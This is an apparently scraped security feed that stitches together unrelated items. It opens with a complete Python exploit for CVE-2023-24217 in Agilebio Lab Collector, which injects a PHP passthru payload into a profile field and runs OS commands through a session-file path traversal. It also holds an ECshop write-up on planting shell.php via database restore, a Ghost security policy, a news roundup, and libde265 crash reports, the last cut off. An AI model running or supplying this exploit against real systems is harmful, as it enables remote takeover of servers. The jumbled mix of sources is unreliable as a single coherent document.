Agilebio Lab Collector version 4.234 suffers from a remote code execution vulnerability.

    # Exploit Title: Agilebio Lab Collector Electronic Lab Notebook Remote Code Execution# Date: 2023-02-28# Exploit Author: Anthony Cole# Vendor Homepage: https://labcollector.com/labcollector-lims/add-ons/eln-electronic-lab-notebook/# Version: v4.234# Contact: http://twitter.com/acole76# Website: http://twitter.com/acole76# Tested on: PHP/MYSQL# CVE: CVE-2023-24217# Category: webapps#   # Lab Collector is a software written in PHP by Agilebio. Version v4.234 allows an authenticated user to execute os commands on the underlying operating system.#  from argparse import ArgumentParserfrom requests import Sessionfrom random import choicefrom string import ascii_lowercase, ascii_uppercase, digitsimport refrom base64 import b64encodefrom urllib.parse import quote_plussess:Session = Session()cookies = {}headers = {}state = {}def random_string(length:int) -> str:    return "".join(choice(ascii_lowercase+ascii_uppercase+digits) for i in range(length))def login(base_url:str, username:str, password:str) -> bool:    data = {"login": username, "pass": password, "Submit":"", "action":"login"}    headers["Referer"] = f"{base_url}/login.php?%2Findex.php%3Fcontroller%3Duser_profile"    res = sess.post(f"{base_url}/login.php", data=data, headers=headers)    if("My profile" in res.text):        return res.text    else:        return None    def logout(base_url:str) -> bool:    headers["Referer"] = f"{base_url}//index.php?controller=user_profile&subcontroller=update"    sess.get(f"{base_url}/login.php?%2Findex.php%3Fcontroller%3Duser_profile%26subcontroller%3Dupdate",headers=headers)def extract_field_value(contents, name):    value = re.findall(f'name="{name}" value="(.*)"', contents)    if(len(value)):        return value[0]    else:        return ""def get_profile(html:str):    return {        "contact_name": extract_field_value(html, "contact_name"),        "contact_lab": extract_field_value(html, "contact_lab"),        "contact_address": extract_field_value(html, "contact_address"),        "contact_city": extract_field_value(html, "contact_city"),        "contact_zip": extract_field_value(html, "contact_zip"),        "contact_country": extract_field_value(html, "contact_country"),        "contact_tel": extract_field_value(html, "contact_tel"),        "contact_email": extract_field_value(html, "contact_email")    }def update_profile(base_url:str, wrapper:str, param:str, data:dict) -> bool:    headers["Referer"] = f"{base_url}/index.php?controller=user_profile&subcontroller=update"    res = sess.post(f"{base_url}/index.php?controller=user_profile&subcontroller=update", data=data, headers=headers)    return Truedef execute_command(base_url:str, wrapper:str, param:str, session_path:str, cmd:str):    session_file = sess.cookies.get("PHPSESSID")    headers["Referer"] = f"{base_url}/login.php?%2F"    page = f"../../../../../..{session_path}/sess_{session_file}"    res = sess.get(f"{base_url}/extra_modules/eln/index.php?page={page}&action=edit&id=1&{param}={quote_plus(cmd)}", headers=headers)    return parse_output(res.text, wrapper)def exploit(args) -> None:    wrapper = random_string(5)    param = random_string(3)    html = login(args.url, args.login_username, args.login_password)        if(html == None):        print("unable to login")        return False        clean = get_profile(html)    data = get_profile(html)    tag = b64encode(wrapper.encode()).decode()    payload = f"<?php $t=base64_decode('{tag}');echo $t;passthru($_GET['{param}']);echo $t; ?>"            data["contact_name"] = payload #inject payload in name field    if(update_profile(args.url, wrapper, param, data)):        login(args.url, args.login_username, args.login_password) # reload the session w/ our payload        print(execute_command(args.url, wrapper, param, args.sessions, args.cmd))        update_profile(args.url, wrapper, param, clean) # revert the profile        logout(args.url)    def parse_output(contents, wrapper) -> None:    matches = re.findall(f"{wrapper}(.*)\s{wrapper}", contents, re.MULTILINE | re.DOTALL)    if(len(matches)):        return matches[0]        return Nonedef main() -> None:    parser:ArgumentParser = ArgumentParser(description="CVE-2023-24217")    parser.add_argument("--url", "-u", required=True, help="Base URL for the affected application.")    parser.add_argument("--login-username", "-lu", required=True, help="Username.")    parser.add_argument("--login-password", "-lp", required=True, help="Password.")    parser.add_argument("--cmd", "-c", required=True, help="OS command to execute.")    parser.add_argument("--sessions", "-s", required=False, default="/var/lib/php/session/", help="The location where php stores session files.")        args = parser.parse_args()    if(args.url.endswith("/")):        args.url = args.url[:-1]    if(args.sessions.endswith("/")):        args.sessions = args.sessions[:-1]    exploit(args)    passif(__name__ == "__main__"):    main()

Agilebio Lab Collector 4.234 Remote Code Execution

A vulnerability, which was classified as problematic, has been found in ECshop up to 4.1.8. Affected by this issue is some unknown functionality of the file admin/database.php of the component Backup Database Handler. The manipulation leads to unrestricted upload. The attack may be launched remotely. The exploit has been disclosed to the public and may be used. The identifier of this vulnerability is VDB-222356.

ECSHOP 4.1.8 Code Execution Vulnerability  
Replication environment: download the source code and build the environment for source code audit  
Vulnerability recurrence:  
After the construction is completed, we can visit http://domain/admin Use ECshop account to enter the Website background  
Select a backup database under Database ->backup. After opening it, you can see its header and footer format is  

In the same format, we can construct the commands we want the database to execute, such as  

After construction, select the constructed sql file in Database ->backup ->Restore backup and submit it  
At this time, shell.php is successfully written under the target folder  
  

The is that the content of the uploaded sql file is filtered in admin/database.php when uploading the sql file, but it can still be inserted into the table of the database through hexadecimal, and then read the data in the table to bypass.  
  

After a successful upload, the command will be automatically executed.  
At the same time, when uploading the sql file, it will be automatically replaced '\\r\\n' to '  
', then we can't bypass the filter.And while the line feed in Windows is '/r/n' so if you need to manually change it to '/n' in Windows.

CVE-2023-1184: ecshop v4.1.8 RCE vulnerability · Issue #1 · wjzdalao/ecshop4.1.8

Ghost 5.35.0 allows authorization bypass: contributors can view draft posts of other users, which is arguably inconsistent with a security policy in which a contributor's draft can only be read by editors until published by an editor. NOTE: the vendor's position is that this behavior has no security impact.

Ghost is committed to developing secure, reliable products utilising all modern security best practices and processes.

The Ghost security team is made up of full time staff employed by the Ghost Foundation as well as volunteer open source contributors and security experts. We do both consultation and penetration testing of our software and infrastructure with external security researchers and agencies.

We take security very seriously at Ghost and welcome any peer review of our completely open source codebase to help ensure that it remains completely secure.

**Security features****Automatic SSL**

Ghost’s CLI tool attempts to automatically configure SSL certificates for all new Ghost installs with Let’s Encrypt by default. In 2019 we intend to make SSL mandatory for all new installs.

**Standardised permissions**

Ghost-CLI does not run as root and automatically configures all server directory permissions correctly according to OWASP Standards.

**Brute force protection**

User login attempts and password reset requests are all limited to 5 per hour per IP.

**Data validation and serialisation**

Ghost performs strong serialisation and validation on all data that goes into the database, as well as automated symlink protection on all uploaded files.

**Encoded tokens everywhere**

All user invitation and password reset tokens are base64 encoded with serverside secret. All tokens are always single use and always expire.

**Password hashing**

Ghost follows OWASP authentication standards with all passwords hashed and salted properly using bcrypt to ensure password integrity.

**SQLi prevention**

Ghost uses Bookshelf ORM + Knex query builder and does not generate _any_ of its own raw SQL queries. Ghost has no interpolation of variables directly to SQL strings.

**XSS prevention**

Ghost uses safe/escaped strings used everywhere, including and especially in all custom Handlebars helpers used in Ghost Themes

**Dependency management**

All Ghost dependencies are continually scanned using a combination of automated GitHub tooling and yarn audit to ensure their integrity.

**Reporting vulnerabilities**

Potential security vulnerabilities can be reported directly to us at security@ghost.org. The Ghost Security Team communicates privately and works in a secured, isolated repository for tracking, testing, and resolving security-related issues.

**Responsible disclosure**

The Ghost Security team is committed to working with security researchers to verify, reproduce and respond to legitimate reported vulnerabilities.

*   Provide details of the vulnerability, including information needed to reproduce and validate the vulnerability and a Proof of Concept
*   Make a good faith effort to avoid privacy violations, destruction and modification of data on live sites
*   Give reasonable time to correct the issue before making any information public

Security issues always take precedence over bug fixes and feature work. We can and do mark releases as “urgent” if they contain serious security fixes.

We will publicly acknowledge any report that results in a security commit to https://github.com/TryGhost/Ghost

**Issue triage**

We’re always interested in hearing about any reproducible vulnerability that affects the security of Ghost users, including…

*   Remote Code Execution (RCE)
*   SQL Injection (SQLi)
*   Server Side Request Forgery (SSRF)
*   Cross Site Request Forgery (CSRF)
*   Cross Site Scripting (XSS) but please read on before reporting XSS…

**However, we’re generally _not_ interested in…**

*   Privilege escalation as result of trusted users publishing arbitrary JavaScript1
*   HTTP sniffing or HTTP tampering exploits
*   Open API endpoints serving public data
*   Ghost version number disclosure
*   Brute force, DoS, DDoS, phishing, text injection, or social engineering attacks.
*   Output from automated scans
*   Clickjacking with minimal security implications
*   Missing DMARC records

**Privilege escalation attacks**

Ghost is a content management system and all users are considered to be privileged/trusted. A user can only obtain an account and start creating content after they have been invited by the site owner or similar administrator-level user.

A basic feature of Ghost as a CMS is to allow content creators to make use of scripts, SVGs, embedded content & other file uploads that are required for the content to display as intended. Because of this there will always be the possibility of “XSS” attacks, albeit only from users that have been trusted to build the site’s content.

Ghost’s admin application does a lot to ensure that unknown scripts are not run within the the admin application itself, however that only protects one side of a Ghost site. If the front-end (the rendered site that anonymous visitors see) shares the same domain as the admin application then browsers do not offer sufficient protections to prevent successful XSS attacks by trusted users.

If you are concerned that trusted users you invite to create your site will act maliciously the best advice is to split your front-end and admin area onto different domains (e.g. https://mysite.com and https://admin.mysite.com/ghost/). This way browsers offer greater built-in protection because credentials cannot be read across domains. Even in this case it should be understood that you are giving invited users completely free reign in content creation so absolute security guarantees do not exist.

Anyone concerned about the security of their Ghost install should read our hardening guide.

We take any attack vector where an untrusted user is able to inject malicious content very seriously and welcome any and all reports.

**How reports are handled**

If you report a vulnerability to us through the security@ghost.org mailing list, we will:

*   Acknowledge your email within a week
*   Investigate and let you know our findings within two weeks
*   Ensure any critical issues are resolved within a month
*   Ensure any low-priority issues are resolved within three months
*   Credit any open source commits to you
*   Let you know when we have released fixes for issues you report

**Privacy**

Ghost as an organisation is self-funded, wholly independent, and only makes revenue directly from its customers. It has zero business interests of any kind predicated on selling private user data.

In addition the Ghost software itself contains a plainly written summary of every privacy-affecting feature within Ghost, along with detailed configuration options allowing any and all of them to be disabled at will. We take user privacy seriously.

CVE-2023-26510: Ghost Security & Privacy

Plus: The US Marshals disclose a “major” cybersecurity incident, T-Mobile has gotten pwned so much, and more.

Chinese hackers proved themselves to be as prolific and invasive as ever this week with new findings revealing that in February 2022, Beijing-backed hackers compromised the email server of the Association of Southeast Asian Nations, an intergovernmental body of 10 Southeast Asian countries. The security alert, first reported by WIRED, comes as China has escalated its hacking in the region amidst rising tensions.

Meanwhile, with Russia facing economic sanctions over its invasion of Ukraine, the Kremlin has been trying to address gaps in its tech sector. Now, we've learned, it's scrambling to get a home-brewed Android phone off the ground this year. The National Computer Corporation company, a Russian IT giant, says it will somehow produce and sell 100,000 smartphones and tablets by the end of 2023. Though Android is an open-source platform, there are steps Google could take to restrict the license for the new Russian phone that could ultimately force the project to seek a different mobile operating system.

At the Network and Distributed System Security Symposium in San Diego this week, researchers from Ruhr University Bochum and the CISPA Helmholtz Center for Information Security presented findings that popular DJI quadcopters communicate using unencrypted radio signals that can be intercepted to determine where the drones are, as well as the GPS coordinates of their operators. The researchers discovered the exposed communications by reverse engineering DJI's radio protocol, DroneID.

In the US, a long-awaited national cybersecurity plan from the White House finally debuted on Thursday. In focuses in part on familiar priorities like hardening defenses for critical infrastructure and and expanding efforts to disrupt cybercriminal activity. But the plan also includes a proposal to shift legal liability for vulnerabilities and security failures onto the companies who cause them, like software makers or institutions that don't make a reasonable effort to protect sensitive data.

If you want to do something good for your cyber hygiene this weekend, we've got a roundup of the most pressing software patches to download ASAP. Seriously, go install them now, we'll wait here.

And there's more. Each week, we round up the security news we didn’t cover in-depth ourselves. Click the headlines to read the full stories, and stay safe out there.

In December, the password-manager maker LastPass revealed that an August breach it had disclosed at the end of November was worse than the company originally thought, compromising encrypted copies of some users’ password vaults, on top of other personal information. Now, the company has disclosed a second incident that began in mid-August and allowed attackers to rampage through the company's cloud storage and exfiltrate sensitive data. Attackers gained such extraordinary access by targeting a specific LastPass employee with deep system privileges 

“This was accomplished by targeting \[a\] DevOps engineer’s home computer and exploiting a vulnerable third-party media software package, which enabled remote code execution capability and allowed the threat actor to implant keylogger malware,” LastPass wrote in an account of the situation. “The threat actor was able to capture the employee’s master password as it was entered, after the employee authenticated with MFA, and gain access to the DevOps engineer’s LastPass corporate vault.”

To target the LastPass employee, attackers exploited a Plex Media Server software vulnerability that had already been long-patched at the time. The company issued a fix for the bug in May 2020, “roughly 75 versions ago,” Plex said.

US law enforcement officials said on Monday that a stand-alone US Marshals Service network suffered a data exfiltration and ransomware attack in mid-February. “The affected system contains law enforcement sensitive information, including returns from legal process, administrative information, and personally identifiable information pertaining to subjects of USMS investigations, third parties, and certain USMS employees,” Marshals Service spokesperson Drew Wade said in a statement. The impacted data seemingly did not include information from the Witness Security Program or witness protection database. Nonetheless, Wade said that officials had “determined that it constitutes a major incident.”

Three cybercriminal groups that conduct SIM-swapping attacks have claimed that they repeatedly hacked T-Mobile last year as part of their scams. The groups would target T-Mobile employees with phishing attacks to gain access to internal company systems. Then they would sell this access to other cybercriminals to intercept individual T-Mobile customers’ SMS text messages and calls on attacker-controlled devices. The findings come from an analysis by Krebs on Security of Telegram chat activity of the three SIM-swapping gangs.

T-Mobile declined to confirm or deny the claims to Krebs on Security. “We have continued to drive enhancements that further protect against unauthorized access, including enhancing multi-factor authentication controls, hardening environments, limiting access to data, apps or services, and more,” the telecom said in a statement. “We are also focused on gathering threat intelligence data, like what you have shared, to help further strengthen these ongoing efforts.”

A bill filed last week in Texas by Representative Steve Toth would mandate that Texas internet service providers block websites that offer information about receiving abortion care. The bill would also outlaw domain registration and hosting for websites that help Texas residents obtain abortions, either through fundraising, procuring abortifacient drugs, or sharing resources. The proposal lists specific examples of websites that would have to be blocked, including aidaccess.org, heyjane.co, plancpills.org, mychoix.co, justthepill.com, and carafem.org.

The LastPass Hack Somehow Gets Worse

CleverStupidDog yf-exam v 1.8.0 is vulnerable to Deserialization which can lead to remote code execution (RCE).

**Have a question about this project?** Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Pick a username

Email Address

Password

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

CVE-2023-26779: fastjson 1.2.56  Deserialization Vulnerabilities · Issue #3 · CleverStupidDog/yf-exam

Libde265 1.0.9 has a heap buffer overflow vulnerability in de265_image::set_SliceAddrRS(int, int, int)

**Description**

heap-buffer-overflow (libde265/build/libde265/libde265.so+0x1ec50d) in de265\_image::set\_SliceAddrRS(int, int, int)

**Version info**

     dec265  v1.0.9
    --------------
    usage: dec265 [options] videofile.bin
    The video file must be a raw bitstream, or a stream with NAL units (option -n).
    
    options:
      -q, --quiet       do not show decoded image
      -t, --threads N   set number of worker threads (0 - no threading)
      -c, --check-hash  perform hash check
      -n, --nal         input is a stream with 4-byte length prefixed NAL units
      -f, --frames N    set number of frames to process
      -o, --output      write YUV reconstruction
      -d, --dump        dump headers
      -0, --noaccel     do not use any accelerated code (SSE)
      -v, --verbose     increase verbosity level (up to 3 times)
      -L, --no-logging  disable logging
      -B, --write-bytestream FILENAME  write raw bytestream (from NAL input)
      -m, --measure YUV compute PSNRs relative to reference YUV
      -T, --highest-TID select highest temporal sublayer to decode
          --disable-deblocking   disable deblocking filter
          --disable-sao          disable sample-adaptive offset filter
      -h, --help        show help
    

**Reproduce**

    git clone https://github.com/strukturag/libde265.git
    cd libde265
    mkdir build
    cd build
    cmake ../ -DCMAKE_CXX_FLAGS="-fsanitize=address"
    make -j$(nproc)
    ./dec265/dec265 653.bin
    

**ASAN**

    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: maximum number of reference pictures exceeded
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    SPS error: TB > CB
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: maximum number of reference pictures exceeded
    WARNING: CTB outside of image area (concealing stream error...)
    =================================================================
    ==732766==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x6070000007d8 at pc 0x7ff23d2ac50e bp 0x7ffce559d1f0 sp 0x7ffce559d1e0
    WRITE of size 2 at 0x6070000007d8 thread T0
        #0 0x7ff23d2ac50d in de265_image::set_SliceAddrRS(int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1ec50d)
        #1 0x7ff23d29fb85 in read_coding_tree_unit(thread_context*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1dfb85)
        #2 0x7ff23d2a8f06 in decode_substream(thread_context*, bool, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e8f06)
        #3 0x7ff23d2aac3f in read_slice_segment_data(thread_context*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1eac3f)
        #4 0x7ff23d1fde6f in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13de6f)
        #5 0x7ff23d1fe673 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13e673)
        #6 0x7ff23d1fd311 in decoder_context::decode_some(bool*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13d311)
        #7 0x7ff23d200345 in decoder_context::decode(int*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x140345)
        #8 0x7ff23d1e63f2 in de265_decode (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1263f2)
        #9 0x564bf4c049a5 in main (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x79a5)
        #10 0x7ff23cb8ed8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
        #11 0x7ff23cb8ee3f in __libc_start_main_impl ../csu/libc-start.c:392
        #12 0x564bf4c027c4 in _start (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x57c4)
    
    0x6070000007d8 is located 0 bytes to the right of 72-byte region [0x607000000790,0x6070000007d8)
    allocated by thread T0 here:
        #0 0x7ff23d50d867 in __interceptor_malloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:145
        #1 0x7ff23d2490b4 in MetaDataArray<CTB_info>::alloc(int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1890b4)
        #2 0x7ff23d245381 in de265_image::alloc_image(int, int, de265_chroma, std::shared_ptr<seq_parameter_set const>, bool, decoder_context*, long, void*, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x185381)
        #3 0x7ff23d2279fa in decoded_picture_buffer::new_image(std::shared_ptr<seq_parameter_set const>, decoder_context*, long, void*, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1679fa)
        #4 0x7ff23d206b0d in decoder_context::process_slice_segment_header(slice_segment_header*, de265_error*, long, nal_header*, void*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x146b0d)
        #5 0x7ff23d1fc970 in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13c970)
        #6 0x7ff23d1ffbe6 in decoder_context::decode_NAL(NAL_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13fbe6)
        #7 0x7ff23d20024c in decoder_context::decode(int*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x14024c)
        #8 0x7ff23d1e63f2 in de265_decode (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1263f2)
        #9 0x564bf4c049a5 in main (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x79a5)
        #10 0x7ff23cb8ed8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
    
    SUMMARY: AddressSanitizer: heap-buffer-overflow (libde265/build/libde265/libde265.so+0x1ec50d) in de265_image::set_SliceAddrRS(int, int, int)
    Shadow bytes around the buggy address:
      0x0c0e7fff80a0: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00
      0x0c0e7fff80b0: 00 00 00 00 00 fa fa fa fa fa 00 00 00 00 00 00
      0x0c0e7fff80c0: 00 00 00 fa fa fa fa fa 00 00 00 00 00 00 00 00
      0x0c0e7fff80d0: 00 fa fa fa fa fa 00 00 00 00 00 00 00 00 00 fa
      0x0c0e7fff80e0: fa fa fa fa fd fd fd fd fd fd fd fd fd fa fa fa
    =>0x0c0e7fff80f0: fa fa 00 00 00 00 00 00 00 00 00[fa]fa fa fa fa
      0x0c0e7fff8100: 00 00 00 00 00 00 00 00 00 fa fa fa fa fa 00 00
      0x0c0e7fff8110: 00 00 00 00 00 00 00 fa fa fa fa fa 00 00 00 00
      0x0c0e7fff8120: 00 00 00 00 04 fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff8130: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
      0x0c0e7fff8140: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa
    Shadow byte legend (one shadow byte represents 8 application bytes):
      Addressable:           00
      Partially addressable: 01 02 03 04 05 06 07 
      Heap left redzone:       fa
      Freed heap region:       fd
      Stack left redzone:      f1
      Stack mid redzone:       f2
      Stack right redzone:     f3
      Stack after return:      f5
      Stack use after scope:   f8
      Global redzone:          f9
      Global init order:       f6
      Poisoned by user:        f7
      Container overflow:      fc
      Array cookie:            ac
      Intra object redzone:    bb
      ASan internal:           fe
      Left alloca redzone:     ca
      Right alloca redzone:    cb
      Shadow gap:              cc
    ==732766==ABORTING
    

**POC**

653.zip

**Impact**

Potentially causing DoS and RCE

**Credit**

Xdchase

CVE-2022-47665: heap-buffer-overflow (libde265/build/libde265/libde265.so+0x1ec50d) in de265_image::set_SliceAddrRS(int, int, int) · Issue #369 · strukturag/libde265

Libde265 1.0.9 is vulnerable to Buffer Overflow in ff_hevc_put_hevc_qpel_pixels_8_sse

**Description**

heap-buffer-overflow (libde265/build/libde265/libde265.so+0x2b6bbb) in ff\_hevc\_put\_hevc\_qpel\_pixels\_8\_sse(short\*, long, unsigned char const\*, long, int, int, short\*)

**Version info**

     dec265  v1.0.9
    --------------
    usage: dec265 [options] videofile.bin
    The video file must be a raw bitstream, or a stream with NAL units (option -n).
    
    options:
      -q, --quiet       do not show decoded image
      -t, --threads N   set number of worker threads (0 - no threading)
      -c, --check-hash  perform hash check
      -n, --nal         input is a stream with 4-byte length prefixed NAL units
      -f, --frames N    set number of frames to process
      -o, --output      write YUV reconstruction
      -d, --dump        dump headers
      -0, --noaccel     do not use any accelerated code (SSE)
      -v, --verbose     increase verbosity level (up to 3 times)
      -L, --no-logging  disable logging
      -B, --write-bytestream FILENAME  write raw bytestream (from NAL input)
      -m, --measure YUV compute PSNRs relative to reference YUV
      -T, --highest-TID select highest temporal sublayer to decode
          --disable-deblocking   disable deblocking filter
          --disable-sao          disable sample-adaptive offset filter
      -h, --help        show help
    

**Reproduce**

    git clone https://github.com/strukturag/libde265.git
    cd libde265
    mkdir build
    cd build
    cmake ../ -DCMAKE_CXX_FLAGS="-fsanitize=address"
    make -j$(nproc)
    ./dec265/dec265 653.bin
    

**ASAN**

    WARNING: end_of_sub_stream_one_bit not set to 1 when it should be
    WARNING: non-existing PPS referenced
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: maximum number of reference pictures exceeded
    WARNING: faulty reference picture list
    WARNING: non-existing PPS referenced
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: non-existing PPS referenced
    WARNING: non-existing PPS referenced
    WARNING: CTB outside of image area (concealing stream error...)
    WARNING: maximum number of reference pictures exceeded
    =================================================================
    ==733371==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x61b00000d190 at pc 0x7f929c8bfbbc bp 0x7ffcdcf97080 sp 0x7ffcdcf97070
    READ of size 16 at 0x61b00000d190 thread T0
        #0 0x7f929c8bfbbb in ff_hevc_put_hevc_qpel_pixels_8_sse(short*, long, unsigned char const*, long, int, int, short*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x2b6bbb)
        #1 0x7f929c7b249f in acceleration_functions::put_hevc_qpel(short*, long, void const*, long, int, int, short*, int, int, int) const (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1a949f)
        #2 0x7f929c7b35a7 in void mc_luma<unsigned char>(base_context const*, seq_parameter_set const*, int, int, int, int, short*, int, unsigned char const*, int, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1aa5a7)
        #3 0x7f929c7a4a8b in generate_inter_prediction_samples(base_context*, slice_segment_header const*, de265_image*, int, int, int, int, int, int, int, PBMotion const*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x19ba8b)
        #4 0x7f929c7b1a2e in decode_prediction_unit(base_context*, slice_segment_header const*, de265_image*, PBMotionCoding const&, int, int, int, int, int, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1a8a2e)
        #5 0x7f929c7ef80b in read_coding_unit(thread_context*, int, int, int, int) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e680b)
        #6 0x7f929c7f1762 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e8762)
        #7 0x7f929c7f1675 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e8675)
        #8 0x7f929c7f1610 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e8610)
        #9 0x7f929c7f15a3 in read_coding_quadtree(thread_context*, int, int, int, int) [clone .localalias] (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e85a3)
        #10 0x7f929c7e8d49 in read_coding_tree_unit(thread_context*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1dfd49)
        #11 0x7f929c7f1f06 in decode_substream(thread_context*, bool, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1e8f06)
        #12 0x7f929c7f3c3f in read_slice_segment_data(thread_context*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1eac3f)
        #13 0x7f929c746e6f in decoder_context::decode_slice_unit_sequential(image_unit*, slice_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13de6f)
        #14 0x7f929c747673 in decoder_context::decode_slice_unit_parallel(image_unit*, slice_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13e673)
        #15 0x7f929c746311 in decoder_context::decode_some(bool*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13d311)
        #16 0x7f929c74605b in decoder_context::read_slice_NAL(bitreader&, NAL_unit*, nal_header&) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13d05b)
        #17 0x7f929c748be6 in decoder_context::decode_NAL(NAL_unit*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x13fbe6)
        #18 0x7f929c74924c in decoder_context::decode(int*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x14024c)
        #19 0x7f929c72f3f2 in de265_decode (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1263f2)
        #20 0x5613fc1319a5 in main (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x79a5)
        #21 0x7f929c0d7d8f in __libc_start_call_main ../sysdeps/nptl/libc_start_call_main.h:58
        #22 0x7f929c0d7e3f in __libc_start_main_impl ../csu/libc-start.c:392
        #23 0x5613fc12f7c4 in _start (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/dec265/dec265+0x57c4)
    
    0x61b00000d190 is located 0 bytes to the right of 1552-byte region [0x61b00000cb80,0x61b00000d190)
    allocated by thread T0 here:
        #0 0x7f929ca5755c in __interceptor_posix_memalign ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:226
        #1 0x7f929c78aa61 in ALLOC_ALIGNED(unsigned long, unsigned long) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x181a61)
        #2 0x7f929c78b202 in de265_image_get_buffer(void*, de265_image_spec*, de265_image*, void*) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x182202)
        #3 0x7f929c78d66b in de265_image::alloc_image(int, int, de265_chroma, std::shared_ptr<seq_parameter_set const>, bool, decoder_context*, long, void*, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x18466b)
        #4 0x7f929c7709fa in decoded_picture_buffer::new_image(std::shared_ptr<seq_parameter_set const>, decoder_context*, long, void*, bool) (/home/sumuchuan/Desktop/libde265_fuzz/libde265/build/libde265/libde265.so+0x1679fa)
